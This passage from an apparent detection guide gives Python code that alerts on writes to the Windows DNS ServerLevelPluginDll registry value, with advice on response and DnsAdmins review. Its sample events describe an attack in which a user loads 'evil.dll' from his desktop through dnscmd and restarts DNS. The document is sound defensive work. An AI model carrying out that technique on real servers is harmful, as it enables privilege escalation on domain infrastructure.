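    {"time": "2019-12-03T06:40:00", "id": 13, "user": r"MEGABANK\ryan",
     "image": r"C:\Windows\System32\dnscmd.exe",
     "target": r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll",
     "details": r"C:\Users\ryan\Desktop\evil.dll"},
    {"time": "2019-12-03T06:40:20", "id": 7036, "service": "DNS Server", "state": "stopped"},
    {"time": "2019-12-03T06:40:25", "id": 7036, "service": "DNS Server", "state": "running"},
    # Routine DNS configuration change that must not alert.
    {"time": "2019-12-03T06:41:00", "id": 13, "user": r"MEGABANK\Administrator",
     "image": r"C:\Windows\System32\dns.exe",
     "target": r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\Forwarders",
     "details": "10.10.10.1"},
]


def detect_plugin_dll(events, window=timedelta(minutes=10)):
    """Return one alert per write to ServerLevelPluginDll. Severity is
    'critical' when the DLL path is outside System32 (a user-writable
    location, as here) or the DNS service restarts within `window` of the
    write, since that is when the DLL actually gets loaded; otherwise 'high'.
    Any write at all is rare enough to deserve a ticket."""
    evs = sorted(events, key=lambda e: e["time"])
    restarts = [datetime.fromisoformat(e["time"]) for e in evs
                if e["id"] == 7036 and e["service"] == "DNS Server"
                and e["state"] == "running"]
    alerts = []
    for e in evs:
        if e["id"] != 13 or not e["target"].lower().endswith(PLUGIN_VALUE):
            continue
        t = datetime.fromisoformat(e["time"])
        outside_system32 = not e["details"].lower().startswith(SYSTEM32)
        restarted = any(t <= r <= t + window for r in restarts)
        alerts.append({
            "time": e["time"], "user": e["user"], "image": e["image"],
            "dll": e["details"], "dns_restarted": restarted,
            "severity": "critical" if (outside_system32 or restarted) else "high",
        })
    return alerts


if __name__ == "__main__":
    for a in detect_plugin_dll(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['user']} set ServerLevelPluginDll to "
              f"{a['dll']} via {a['image']}; DNS restarted: {a['dns_restarted']}")
```

Beyond alerting, the same value is the thing to check during response: an empty ServerLevelPluginDll is the expected state on a DNS server that uses no plugin, and DnsAdmins membership should be reviewed against who actually administers DNS.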